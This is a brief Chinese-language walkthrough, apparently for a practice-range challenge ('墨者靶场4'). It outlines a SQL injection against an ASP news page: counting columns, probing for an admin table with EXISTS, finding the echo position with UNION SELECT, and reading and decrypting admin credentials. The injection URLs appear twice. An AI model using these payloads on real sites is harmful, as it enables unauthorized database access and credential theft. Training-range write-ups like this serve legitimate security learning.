墨者靶场4
By/shy014
- 确定列数,为4列
- 确定存在admin表
http://219.153.49.228:47368/new_list.asp?id=1 and exists (select * from admin)
- 确定回显位置
http://219.153.49.228:47368/new_list.asp?id=1 union select 1,2,3,4 from admin
- 确定存在username字段和passwd字段
- 读取用户和密码
- 解密并提交key
http://219.153.49.228:47368/new_list.asp?id=1 and exists (select * from admin)
http://219.153.49.228:47368/new_list.asp?id=1 union select 1,2,3,4 from admin